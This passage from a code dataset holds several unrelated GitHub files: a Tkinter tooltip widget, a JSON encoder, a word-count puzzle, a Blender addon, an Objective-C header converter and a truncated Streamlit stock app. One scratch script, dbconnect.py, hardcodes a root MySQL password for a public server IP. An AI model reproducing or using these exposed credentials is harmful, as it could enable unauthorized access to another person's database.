\ttkFileDialog\nexcept ImportError:\n\timport\ttkinter.filedialog\ntry:\n\timport \ttkMessageBox\nexcept ImportError:\n\timport\ttkinter.messagebox\n\ntry:\n\timport \tttk\n\tfrom \t\tttk import *\nexcept ImportError:\n\tfrom tkinter import ttk\n\t#from \t\tttk import *\ntry:\n\timport \ttkFont\nexcept ImportError:\n\timport\ttkinter.font\n\nclass ToolTip( Toplevel ):\n\tShowToolTips = True\n\tShowTipNumber = False\n\tShowTipDelay = 1.0\t\t# 1 second initial delay\n\tTipLines = []\t\t\t\t# All the tip text in lines\n\t@staticmethod\n\tdef LoadToolTips ( ):\t# Perhaps allow a reload of tips?\n\t\ttipsFile = open(\"Assets/Tooltips.txt\", \"r\")\n\t\tif tipsFile:\n\t\t\tToolTip.TipLines = tipsFile.read().split('\\n')\n\t\t\ttipsFile.close()\n\t\telse:\n\t\t\tprint ( \"Error opening file 'Assets/Tooltips.txt'\" )\n\t@staticmethod\n\tdef GetTooltipText ( ID ):\n\t\tappend = False\n\t\ttip = \"\"\n\t\tfor text in ToolTip.TipLines:\n\t\t\ttext = text.strip()\n\t\t\ttext = text.replace('(C)',\n\t\t\t\t'\\n\\nThanks to: picamera.readthedocs.io/en/release-1.13/api_camera.html')\n\t\t\tif append:\n\t\t\t\t# Buggy - spaces are being lost in the text\n\t\t\t\tif text.endswith('\\\\n') is True: tip = tip + text\n\t\t\t\telse:\ttip = tip + ' ' + text\t# add a space for next line\n\t\t\t\tif tip.endswith('$') is True:\n\t\t\t\t\treturn tip.replace('$','').replace(\"\\\\n\",\"\\n\")\n\t\t\telse:\n\t\t\t\tif len(text) is 0 or text[0] is '#': continue\n\t\t\t\tID_Tip = text.split(':',1) # only the first colon is a split\n\t\t\t\ttry:\n\t\t\t\t\tif int(ID_Tip[0].strip()) == ID: # find a better way\n\t\t\t\t\t\t# We have a match\n\t\t\t\t\t\t# Check if the text continues on multiple lines\n\t\t\t\t\t\ttip = ID_Tip[1].strip()\n\t\t\t\t\t\tappend = False if tip.endswith('$') else True\n\t\t\t\t\t\tif append is False:\n\t\t\t\t\t\t\treturn tip.replace(\"\\\\n\",\"\\n\").replace('$','')\n\t\t\t\texcept: pass\n\t\treturn 'Tooltip text for ID %d not found.' % ID\n\t\"\"\"\n\tProvides a ToolTip widget for Tkinter.\n\tTo apply a ToolTip to any Tkinter widget, simply pass the widget to the\n\tToolTip constructor\n\t\"\"\"\n\tdef __init__( self, wdgt, msg=None, msgFunc=None, follow=1 ):\n\t\t\"\"\"\n\t\tInitialize the ToolTip\n\t\tArguments:\n\t\t\twdgt: The widget to which this ToolTip is assigned\n\t\t\tmsg: A static string message assigned to the ToolTip\n\t\t\t\t\tif msg istype integer - search for text in TipLines\n\t\t\tmsgFunc: A function that retrieves a string to use as the ToolTip text\n\t\t\tdelay: The delay in seconds before the ToolTip appears(may be float)\n\t\t\tfollow: If True, the ToolTip follows motion, otherwise hides\n\t\t\"\"\"\n\t\tself.wdgt = wdgt\n\t\t# The parent of the ToolTip is the parent of the ToolTips widget\n\t\tself.parent = self.wdgt.master\n\t\t# Initalise the Toplevel\n\t\tToplevel.__init__( self, self.parent, bg='black', padx=1, pady=1 )\n\t\tself.withdraw() # Hide initially\n\t\t# The ToolTip Toplevel should have no frame or title bar\n\t\tself.overrideredirect( True )\n\t\t# The msgVar will contain the text displayed by the ToolTip\n\t\tself.msgVar = StringVar()\n\t\tself.TipID = None\n\t\tself.TipNumText = \"\"\n\t\ttry:\n\t\t\tif msg is None:\n\t\t\t\tself.msgVar.set('No tooltip provided')\n\t\t\telif type(msg) is int:\t# lookup tooltip text in file\n\t\t\t\tself.TipID = msg\n\t\t\t\tself.msgVar.set(ToolTip.GetTooltipText(msg))\n\t\t\t\tself.TipNumText = \"Tip number %d\\n\\n\" % self.TipID\n\t\t\telse:\t# assume a string is passed\n\t\t\t\tself.msgVar.set( msg )\n\t\texcept:\n\t\t\tself.msgVar.set('ERROR getting tooltip')\n\t\tself.msgFunc = msgFunc\t\t# call this function to return tip text\n\t\tself.follow = follow\t\t\t# move tip if mouse moves\n\t\tself.visible = 0\n\t\tself.lastMotion = 0\n\t\t# The test of the ToolTip is displayed in a Message widget\n\t\tMessage( self, textvariable=self.msgVar, bg='#FFFFDD',\n\t\t\t\t\taspect=250 ).grid()\n\t\t# Add bindings to the widget. This will NOT override bindings\n\t\t# that the widget already has\n\t\tself.wdgt.bind( '', self.spawn, '+' )\n\t\tself.wdgt.bind( '', self.hide, '+' )\n\t\tself.wdgt.bind( '', self.move, '+' )\n\n\tdef spawn( self, event=None ):\n\t\t\"\"\"\n\t\tSpawn the ToolTip. This simply makes the ToolTip eligible for display.\n\t\tUsually this is caused by entering the widget\n\t\tArguments:\n\t\t\tevent: The event that called this funciton\n\t\t\"\"\"\n\t\tself.visible = 1\n\t\t# The after function takes a time argument in miliseconds\n\t\tself.after( int( ToolTip.ShowTipDelay * 1000 ), self.show )\n\n\tdef show( self ):\n\t\t\"\"\"\n\t\tDisplays the ToolTip if the time delay has been long enough\n\t\t\"\"\"\n\t\tif ToolTip.ShowToolTips is False: return\n\t\ttext = self.msgVar.get()\n\t\tif ToolTip.ShowTipNumber is True and self.TipID is not None:\n\t\t\t# check if text is not there, if so add it\n\t\t\tif self.TipNumText not in text:\n\t\t\t\tself.msgVar.set(self.TipNumText+text)\n\t\telse:\n\t\t\ttext.replace(self.TipNumText,\"\")\n\t\t\tself.msgVar.set(text)\n\n\t\tif self.visible == 1 and time() - self.lastMotion > ToolTip.ShowTipDelay:\n\t\t\tself.visible = 2\n\t\tif self.visible == 2:\n\t\t\tself.deiconify()\n\n\tdef move( self, event ):\n\t\t\"\"\"\n\t\tProcesses motion within the widget.\n\t\tArguments:\n\t\tevent: The event that called this function\n\t\t\"\"\"\n\t\tself.lastMotion = time()\n\t\t# If the follow flag is not set, motion within the widget will\n\t\t# make the ToolTip dissapear\n\t\tif self.follow == False:\n\t\t\tself.withdraw()\n\t\t\tself.visible = 1\n\t\t# Offset the ToolTip 10x10 pixels southeast of the pointer\n\t\tself.geometry( '+%i+%i' % ( event.x_root+10, event.y_root+10 ) )\n\t\t# Try to call the message function. Will not change the message\n\t\t# if the message function is None or the message function fails\n\t\ttry:\t\tself.msgVar.set( self.msgFunc() )\n\t\texcept:\tpass\n\t\tself.after( int( ToolTip.ShowTipDelay * 1000 ), self.show )\n\n\tdef hide( self, event=None ):\n\t\t\"\"\"\n\t\tHides the ToolTip. Usually this is caused by leaving the widget\n\t\tArguments:\n\t\t\tevent: The event that called this function\n\t\t\"\"\"\n\t\tself.visible = 0\n\t\tself.withdraw()\n","repo_name":"Billwilliams1952/PiCameraApp","sub_path":"Source/Tooltip.py","file_name":"Tooltip.py","file_ext":"py","file_size_in_byte":5823,"program_lang":"python","lang":"en","doc_type":"code","stars":266,"dataset":"github-code","pt":"52"} +{"seq_id":"40834933058","text":"import json\nimport numpy as np\nimport torch\n\n# Some numpy types are not serializable to JSON out-of-the-box in Python3 --\n# need coersion. See\n# http://stackoverflow.com/questions/27050108/convert-numpy-type-to-python/\n# 27050186#27050186\n\n\nclass JsonEncoder(json.JSONEncoder):\n \"\"\" A custom JSON encoder with support for numpy arrays and torch tensors\n\n This encoder can be used instead of `json.JSONEncoder` from the standard\n library, with added support for numpy arrays and torch tensors, which\n will be converted to JSON arrays.\n\n This encoder can be used to serialise models built using the modules\n defined in `taiyaki.layers` in a guppy-compatible format.\n\n Examples:\n >>> import json\n >>> from taiyaki.json import JsonEncoder\n >>> from taiyaki.layers import FeedForward, Serial\n >>> model = Serial([FeedForward(1, 12), FeedForward(12, 32)])\n >>> json.dumps(model.json(), indent=2, cls=JsonEncoder)\n {\n \"type\": \"serial\",\n \"sublayers\": [\n {\n \"type\": \"feed-forward\",\n \"activation\": \"linear\",\n \"size\": 12,\n \"insize\": 1,\n \"bias\": true\n },\n {\n \"type\": \"feed-forward\",\n \"activation\": \"linear\",\n \"size\": 32,\n \"insize\": 12,\n \"bias\": true\n }\n ]\n }\n \"\"\"\n\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n elif isinstance(obj, torch.nn.Parameter):\n return obj.data\n elif isinstance(obj, torch.Tensor):\n return obj.detach_().numpy()\n else:\n return super(JsonEncoder, self).default(obj)\n","repo_name":"nanoporetech/taiyaki","sub_path":"taiyaki/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"52"} +{"seq_id":"73852087206","text":"from collections import defaultdict\n\n\ndef ransom_note(magazine, ransom):\n\n word_dict = defaultdict(lambda: 0)\n for w in magazine:\n word_dict[w] += 1\n cnt = 0\n for w in ransom:\n if w in word_dict:\n if word_dict[w] > 0:\n word_dict[w] -= 1\n cnt += 1\n else:\n break\n if len(ransom) == cnt:\n return True\n return False","repo_name":"kohn1001/hackerrank","sub_path":"python/ransome_note.py","file_name":"ransome_note.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18774277852","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 6 15:10:06 2023\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport pymysql\r\n \r\n# 打开数据库连接\r\n# db = pymysql.connect(\"120.48.49.157:3306\",\"remote\",\"remote123456\",\"test_1\" )\r\ndb = pymysql.connect(\r\n host=\"120.48.49.157\", \r\n port=3306,\r\n user='root', #在这里输入用户名\r\n password='root123321', #在这里输入密码\r\n charset='utf8mb4' ,\r\n database='TX_NEWS'\r\n ) #连接数据库\r\n\r\n\r\n# 使用 cursor() 方法创建一个游标对象 cursor\r\ncursor = db.cursor()\r\n\r\n\r\n# SQL 查询语句,查询user表\r\nsql = \"select BEIZ from SHUM_03\" \r\n\r\ncursor.execute(sql)\r\n\r\n#这是查询表中所有的数据\r\nrest=cursor.fetchall()\r\n\r\n\r\nHTML = 'https://new.qq.com/omn/20230225/20230225V03L7400.html'\r\nyuan = (HTML,)\r\nif yuan in rest:\r\n print('存在')\r\n# c.execute(\"SELECT DISTINCT * FROM 'TX_0227';\")\r\n# print (\"数据表去重成功\")\r\n# c.execute('''CREATE TABLE TX_0301\r\n# (BIAOT TEXT NOT NULL,\r\n# ZUOZ TEXT NOT NULL,\r\n# PINGL TEXT ,\r\n# NEIR TEXT ,\r\n# TIME TEXT NOT NULL,\r\n# FENL TEXT NOT NULL,\r\n# ZURL TEXT NOT NULL,\r\n# BEIZ TEXT);''')\r\n# print (\"数据表创建成功\")\r\n\r\n\r\n# 关闭数据库连接\r\ncursor.close() \r\ndb.close()\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%\r\nimport random\r\nimport linecache\r\n# with open(\"D:/yan.txt\", \"r\", encoding='utf-8') as f: #打开文本\r\n# data = f.read() #读取文本\r\n# print(data)\r\n\r\ndef User_Agent():\r\n txt = open('D:/yan.txt', 'rb')\r\n data = txt.read().decode('utf-8') # python3一定要加上这句不然会编码报错!\r\n txt.close()\r\n\r\n # 获取txt的总行数!\r\n n = data.count('\\n')\r\n #print(\"总行数\", n)\r\n # 选取随机的数\r\n i = random.randint(1, (n + 1))\r\n #print(\"本次使用的行数\", i)\r\n ###得到对应的i行的数据\r\n line=linecache.getline(r'D:/yan.txt', i)\r\n print(line)\r\n return line\r\n\r\nUser_Agent()\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%\r\nimport sqlite3\r\n\r\nconn = sqlite3.connect('D:/TenCen/history/AUTO.db')\r\nprint (\"数据库打开成功\")\r\nc = conn.cursor()\r\n# c.execute(\"SELECT DISTINCT * FROM 'TX_0227';\")\r\n# print (\"数据表去重成功\")\r\nconn.execute(\r\n '''INSERT INTO TX_0301 (url,dan) VALUES (\"{}\",\"{}\")'''.format(url,dan));\r\n# c.execute('''CREATE TABLE TX_0301\r\n# (BIAOT TEXT NOT NULL,\r\n# ZUOZ TEXT NOT NULL,\r\n# PINGL TEXT ,\r\n# NEIR TEXT ,\r\n# TIME TEXT NOT NULL,\r\n# FENL TEXT NOT NULL,\r\n# ZURL TEXT NOT NULL,\r\n# BEIZ TEXT);''')\r\n# print (\"数据表创建成功\")\r\n# insert into 'TT' select distinct * from 'TX_0227';\r\n# insert into 'TT' select distinct * from 'TX_0228' WHERE 'NEIR' <> '';\r\nconn.commit()\r\nconn.close()\r\n\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\nimport shortuuid\r\nimport uuid\r\n# 生成一个标准格式32位UUID,参数为位数\r\n# def new_uuid(length=None):\r\n# if length is None:\r\n# return str(uuid.uuid1())\r\n# else:\r\n# return str(shortuuid.ShortUUID().random(length=length))\r\n \r\n# uid = uuid.uuid1(8)\r\n# print(uid)\r\n# print(uid.hex)\r\nprint(shortuuid.uuid())\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\n# 导入 requests 包\r\nimport requests\r\n\r\n# 发送请求\r\nx = requests.get('http://114.132.77.224:5000/code')\r\n\r\n# 返回网页内容\r\nprint(x.text)\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\nurl = 'https://i.postimg.cc/GpHR9tmg/MWJ4.jpg\\n'\r\nu = url.split('/')[-1].split('.')[0]\r\nprint(u.split('.')[0])\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\n\r\nproject = {\r\n \"code\": \"OK\",\r\n \"result\":{\r\n \"msg\": '账号注册',\r\n \"user\": {\r\n \"app_ID\" :'app_ID',\r\n \"HS_url\":'',\r\n \"real_name\":'',\r\n \"ID_Number\":'',\r\n \"nick_name\":'user_'+'num',\r\n \"SEX\":1,\r\n \"Phone_number\":'num',\r\n \"password\":'password',\r\n \"Following\":'',\r\n \"Status\":1,\r\n }\r\n }\r\n}\r\nprint(project['result']['user'])\r\n\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\nimport re \r\n\r\ninput1 = '10915278761'\r\nPattern1 = re.compile(r'^1[34578]\\d{9}$')\r\nresult1 = Pattern1.match(input1)\r\nif result1:\r\n print(input1, \"手机号符合要求.\")\r\nelse:\r\n print(input1, \"手机号不符合要求.\")","repo_name":"Camydb/FirstRepository","sub_path":"dbconnect.py","file_name":"dbconnect.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"203195823","text":"import unittest\n\nclass RedisSessionTestCase(unittest.TestCase):\n\n def test_create(self):\n self.assertTrue(True)\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(RedisSessionTestCase))\n return suite\n\n\nif __name__ == '__main__':\n unittest.main(defaultTest=\"suite\")\n","repo_name":"Lispython/redis_session_backend","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38359054369","text":"from __future__ import annotations\n\nfrom typing import Literal\n\nimport quantities as pq\nfrom pandas import DataFrame, DatetimeTZDtype, CategoricalDtype, PeriodDtype, SparseDtype, IntervalDtype, \\\n StringDtype, BooleanDtype\nfrom pandera import SeriesSchema\n\nfrom openmnglab.datamodel.exceptions import DataSchemaCompatibilityError\nfrom openmnglab.datamodel.pandas.model import PandasDataSchema\nfrom openmnglab.functions.base import FunctionDefinitionBase\nfrom openmnglab.functions.processing.funcs.static_intervals import StaticIntervalsFunc\nfrom openmnglab.model.datamodel.interface import ISchemaAcceptor, IDataSchema\nfrom openmnglab.model.functions.interface import IFunction\nfrom openmnglab.model.planning.interface import IDataReference\nfrom openmnglab.util.hashing import HashBuilder\n\n\nclass IntervalSchemaAcceptor(ISchemaAcceptor):\n\n def accepts(self, output_data_scheme: IDataSchema) -> bool:\n if not isinstance(output_data_scheme, PandasDataSchema):\n raise DataSchemaCompatibilityError(\"Data scheme is not a pandas data scheme\")\n schema = output_data_scheme.pandera_schema\n if not isinstance(schema, SeriesSchema):\n raise DataSchemaCompatibilityError(\"Data scheme must be a series\")\n schema: SeriesSchema\n assert schema.dtype not in (\n DatetimeTZDtype, CategoricalDtype, PeriodDtype, SparseDtype, IntervalDtype, StringDtype, BooleanDtype)\n return True\n\n\nclass DynamicIndexIntervalSchema(PandasDataSchema[SeriesSchema]):\n\n @staticmethod\n def for_input(inp: PandasDataSchema[SeriesSchema], name: str) -> DynamicIndexIntervalSchema:\n return DynamicIndexIntervalSchema(SeriesSchema(IntervalDtype, index=inp.pandera_schema.index, name=name))\n\n\nclass StaticIntervals(FunctionDefinitionBase[IDataReference[DataFrame]]):\n \"\"\"Creates intervals based on a low and high offset\n\n In: series of numbers\n\n Out: Series of pd.Interval, with the same index as the input series.\n\n :param offset_low: quantity of low offset\n :param offset_high: quantity of high offset\n :param name: name of the returned series\n :param closed: how the interval is closed / open\n \"\"\"\n\n def __init__(self, offset_low: pq.Quantity, offset_high: pq.Quantity, name: str,\n closed: Literal[\"left\", \"right\", \"both\", \"neither\"] = \"right\"):\n FunctionDefinitionBase.__init__(self, \"openmnglab.windowing\")\n assert (isinstance(offset_low, pq.Quantity))\n assert (isinstance(offset_high, pq.Quantity))\n assert (isinstance(name, str))\n assert (closed in (\"left\", \"right\", \"both\", \"neither\"))\n self._lo = offset_low\n self._hi = offset_high\n self._name = name\n self._closed = closed\n\n @property\n def config_hash(self) -> bytes:\n return HashBuilder() \\\n .str(self._name) \\\n .quantity(self._lo) \\\n .quantity(self._hi) \\\n .str(self._name) \\\n .str(self._closed) \\\n .digest()\n\n @property\n def slot_acceptors(self) -> IntervalSchemaAcceptor:\n return IntervalSchemaAcceptor()\n\n def output_for(self, inp: PandasDataSchema) -> DynamicIndexIntervalSchema:\n assert isinstance(inp, PandasDataSchema)\n return DynamicIndexIntervalSchema.for_input(inp, self._name)\n\n def new_function(self) -> IFunction:\n return StaticIntervalsFunc(self._lo, self._hi, self._name, closed=self._closed)\n","repo_name":"Digital-C-Fiber/openMNGlab","sub_path":"openmnglab/functions/processing/static_intervals.py","file_name":"static_intervals.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32610774540","text":"from django.urls import path, include\n\nfrom ..apiviews.applicant import (\n ApplicantsListAPIView,\n ApplicantCreateAPIView,\n ApplicantUpdateAPIView,\n ApplicantDeleteAPIView,\n ApplicantRetrieveAPIView\n)\n\napp_name = 'applicant'\n\nurlpatterns = [\n path('', include([\n path('', ApplicantsListAPIView.as_view(), name='applicants_list'),\n path('create/', ApplicantCreateAPIView.as_view(), name='applicant_create'),\n path('/', include([\n path('', ApplicantRetrieveAPIView.as_view(), name='applicant_retrieve'),\n path('update/', ApplicantUpdateAPIView.as_view(), name='applicant_update'),\n path('delete/', ApplicantDeleteAPIView.as_view(), name='applicant_delete'),\n ])),\n ]))\n]\n","repo_name":"adepeter/moove-dj-assessment","sub_path":"Moove_Assessment_Api/urls/applicant.py","file_name":"applicant.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42203317050","text":"import sys\nimport math\ninput = sys.stdin.buffer.readline\ndef I(): return(list(map(int,input().split())))\ndef sieve(n):\n\ta=[1]*n\n\tfor i in range(2,n):\n\t if a[i]:\n\t for j in range(i*i,n,i):\n\t a[j]=0\n\treturn a\n\nfor __ in range(int(input())):\n\tn,g,b=I()\n\tk=math.ceil(n/2)\n\ttogetgood=math.ceil(k/g)*(g+b)\n\textragood=(togetgood//(g+b))*g-k\n\t# print(togetgood,extragood)\n\ttogetgood-=extragood+b\n\tprint(max(n,togetgood))\n\n\n","repo_name":"vishwesh-D-kumar/codeforces_submissions","sub_path":"1303/b/78644037.py","file_name":"78644037.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72248297765","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n\nbl_info = {\n 'name': 'Light Field Tools',\n 'author': 'Aurel Wildfellner',\n 'description': 'Tools to create a light field camera and projector',\n 'version': (0, 2, 1),\n 'blender': (2, 5, 7),\n 'api': 36103,\n 'location': 'View3D > Tool Shelf > Light Field Tools',\n 'url': 'http://www.jku.at/cg/',\n \"wiki_url\": \"http://wiki.blender.org/index.php/Extensions:2.5/Py/Scripts/Render/Light_Field_Tools\",\n \"tracker_url\": \"http://projects.blender.org/tracker/index.php?func=detail&aid=25719\",\n 'category': 'Render'\n}\n\n\nif \"bpy\" in locals():\n import imp\n imp.reload(light_field_tools)\nelse:\n from . import light_field_tools\n\n\nimport bpy\nfrom bpy.props import *\n\n\n# global properties for the script, mainly for UI\nclass LightFieldPropertyGroup(bpy.types.PropertyGroup):\n angle = FloatProperty(\n name=\"Angle\",\n # 40 degrees\n default=0.69813170079,\n min=0,\n # 172 degrees\n max=3.001966313430247,\n precision=2,\n subtype = 'ANGLE',\n description=\"Field of view of camera and angle of beam for spotlights\")\n row_length = IntProperty(\n name=\"Row Length\",\n default=1,\n min=1,\n description=\"The number of cameras/lights in one row\")\n create_handler = BoolProperty(\n name=\"Handler\",\n default=True,\n description=\"Creates an empty object, to which the cameras and spotlights are parented to\")\n do_camera = BoolProperty(\n name=\"Create Camera\",\n default=True,\n description=\"A light field camera is created\")\n animate_camera = BoolProperty(\n name=\"Animate Camera\",\n default=True,\n description=\"Animates a single camera, so not multiple cameras get created\")\n do_projection = BoolProperty(\n name=\"Create Projector\",\n default=False,\n description=\"A light field projector is created\")\n texture_path = StringProperty(\n name=\"Texture Path\",\n description=\"From this path textures for the spotlights will be loaded\",\n subtype='DIR_PATH')\n light_intensity = FloatProperty(\n name=\"Light Intensity\",\n default=2,\n min=0,\n precision=3,\n description=\"Total intensity of all lamps\")\n # blending of the spotlights\n spot_blend = FloatProperty(\n name=\"Blend\",\n default=0,\n min=0,\n max=1,\n precision=3,\n description=\"Blending of the spotlights\")\n # spacing in pixels on the focal plane\n spacing = IntProperty(\n name=\"Spacing\",\n default=10,\n min=0,\n description=\"The spacing in pixels between two cameras on the focal plane\")\n\n\n\ndef register():\n # register properties\n bpy.utils.register_class(LightFieldPropertyGroup)\n bpy.types.Scene.lightfield = bpy.props.PointerProperty(type=LightFieldPropertyGroup)\n bpy.utils.register_module(__name__)\n\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"damiles/blendocv","sub_path":"release/scripts/addons/light_field_tools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"52"} +{"seq_id":"70043696165","text":"\n# -*- coding:utf-8 -*-\n\nimport os\nimport re\n\n# 不进行转换的头文件列表\nuncvt_list = ['MTLFence', 'UITextInputTraits', 'UIUserNotificationSettings', 'NSURL', 'MTLCommandQueue', 'UIPopoverController', 'UITextDragging', 'MTLTexture']\n\nlemon_frameworks = '../lemon_frameworks'\nlemon_properties = '../lemon_frameworks/lemon_properties'\n\ndef get_frameworks():\n Frameworks = input('请键入Framework的路径:')\n if os.path.exists(Frameworks):\n if not os.path.exists(lemon_frameworks):\n os.mkdir(lemon_frameworks)\n os.mkdir(lemon_properties)\n frameworks = os.listdir(Frameworks)\n for framework in frameworks:\n convert_framework(Frameworks, framework) \n\ndef convert_framework(Frameworks, framework):\n if Frameworks.endswith('/'):\n Frameworks = Frameworks[:-1]\n Headers = Frameworks + '/' + framework + '/' + 'Headers'\n if os.path.exists(Headers):\n headers = os.listdir(Headers)\n for header in headers:\n if header.endswith('.h'):\n convert_header(Headers, header)\n\ndef convert_header(Headers, header):\n # 头文件path\n header = Headers + '/' + header\n \n # 判断是否在'不转换列表'中\n class_name = re.match(r'^.*[/]([^/]+)[.][h]$', header).group(1)\n if class_name in uncvt_list:\n return\n\n # 创建'读者'\n reader = get_reader(header)\n\n # 抓取propertys\n properties = get_properties(reader)\n if len(properties) == 0:\n return\n\n # 创建'写者'\n header_writer = get_header_writer(class_name)\n def_writer = get_def_writer(class_name)\n \n # 抓取库名称\n Kit = re.match(r'^.*/([^/]+)[.]framework.*$', Headers).group(1)\n\n # 写入category.h\n write_header(header_writer, Kit, class_name, properties)\n\n # 写入category.m\n write_def(def_writer, class_name, properties)\n\ndef get_reader(header):\n return open(header, 'r')\n\ndef get_header_writer(class_name):\n return open('{0}/{1}+Property.h'.format(lemon_properties, class_name), 'w')\n\ndef get_def_writer(class_name):\n return open('{0}/{1}+Property.m'.format(lemon_properties, class_name), 'w')\n\ndef get_properties(reader):\n # 提取所有文本\n lines = []\n while True:\n try:\n line = reader.readline()\n except:\n print('exist unable to decode text line. (存在无法解码的一行文本,直接跳过)')\n else:\n if len(line) == 0:\n break\n lines.append(line)\n reader.close()\n\n # 正则匹配出property_line 注意:readonly属性抛弃 泛型属性抛弃\n # names 用于过滤category中重复的属性名\n names = [] \n\n # 用于存储 导入文件\n imports = []\n # 用于储存\"属性\" 结果:key-value\n properties = [] \n\n for line in lines: \n # 匹配属性\n mat = re.match(r'^@property\\s*[^)]+[)]\\s*(\\S+)\\s+(\\S+)\\s*.*[;].*\\n$', line)\n \n # 匹配成功\n if mat: \n # 过滤readonly and 泛型\n if re.search(r'readonly', mat.group()) or re.search(r'<', mat.group()): \n continue\n\n # 提取 type name\n item_type = mat.group(1)\n item_name = mat.group(2)\n \n # 去除错误property\n if item_name.find('(') != -1:\n continue\n if len(item_name) == 0:\n continue\n \n # 过滤重复property\n if item_name in names: \n continue\n names.append(item_name)\n \n # 将 (type) (*name) 转换至 (type*) (name)\n m = re.match(r'^([*]+)(\\w+)$', item_name)\n if m: \n item_name = m.group(2)\n item_type = item_type + m.group(1)\n properties.append({'type':item_type, 'name':item_name}) \n\n return properties\n\ndef write_header(header_writer, Kit, class_name, properties):\n header_writer.write('#import <{0}/{1}.h>\\n\\n'.format(Kit, class_name))\n header_writer.write('@interface {0} (Property)\\n\\n'.format(class_name))\n header_writer.write('+ (instancetype)instance;\\n\\n')\n for key_value in properties:\n item_type = key_value['type']\n item_name = key_value['name']\n header_writer.write('- ({0}* (^)({1} {2}))update_{2};\\n\\n'.format(class_name, item_type, item_name))\n header_writer.write('@end\\n\\n')\n header_writer.close()\n\ndef write_def(def_writer, class_name, properties):\n def_writer.write('#import \"{0}+Property.h\"\\n\\n'.format(class_name))\n def_writer.write('@implementation {0} (Property)\\n\\n'.format(class_name))\n def_writer.write('+ (instancetype)instance\\n')\n def_writer.write('{\\n')\n def_writer.write(' return [[self alloc] init];\\n')\n def_writer.write('}\\n\\n')\n for key_value in properties:\n item_type = key_value['type']\n item_name = key_value['name']\n def_writer.write('- ({0}* (^)({1} {2}))update_{2}\\n'.format(class_name, item_type, item_name))\n def_writer.write('{\\n')\n def_writer.write(' return ^({0} {1}) {{\\n'.format(item_type, item_name))\n def_writer.write(' self.{0} = {0};\\n'.format(item_name))\n def_writer.write(' return self;\\n')\n def_writer.write(' };\\n')\n def_writer.write('}\\n\\n')\n def_writer.write('@end\\n\\n')\n def_writer.close()\n\ndef write_import_lead():\n writer = open('{0}/lemon_property.h'.format(lemon_properties), 'w')\n headers = os.listdir(lemon_properties)\n for header in headers:\n if header.endswith('h'):\n writer.write('#import \"{0}\"\\n'.format(header))\n\nif __name__ == '__main__':\n get_frameworks()\n write_import_lead()\n print('Successfuly!')\n","repo_name":"coderMR/Lemon","sub_path":"converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13739700926","text":"import streamlit as st\nimport matplotlib.pyplot as plt\nimport yfinance as yf\nfrom datetime import datetime, timedelta\nfrom matplotlib.dates import DateFormatter\n\n# Streamlit app configuration\nst.title('Stock Price Analysis')\nst.sidebar.header('User Input')\n\n# User input for stock symbol and time interval\nstock_input = st.sidebar.text_input(\"Enter Stock\", \"AAPL\")\ntime_input = st.sidebar.selectbox(\"Select Time\", ['1D', '5D', '1M', '3M', '6M', '1Y', '5Y'])\navg_input = st.sidebar.selectbox(\"Select Days\",[9,20,44,50,100,200])\n\n# Define a dictionary to map time intervals to timedelta objects\ntime_interval_mapping = {\n '1D': timedelta(days=1),\n '5D': timedelta(days=5),\n '1M': timedelta(days=30), # Assuming 1 month is approximately 30 days\n '3M': timedelta(days=90),\n '6M': timedelta(days=180),\n '1Y': timedelta(days=365), # Assuming 1 year is approximately 365 days\n '5Y': timedelta(days=5 * 365), # Assuming 5 years is approximately 5 * 365 days\n}\n\n# Get the timedelta object for the selected time interval\nselected_time_interval = time_interval_mapping.get(time_input, timedelta(days=1)) # Default to 1 day if not found\n\n# Calculate the start_date by subtracting the selected time interval from today's date\ntoday_date = datetime.now().date()\nstart_date = today_date - 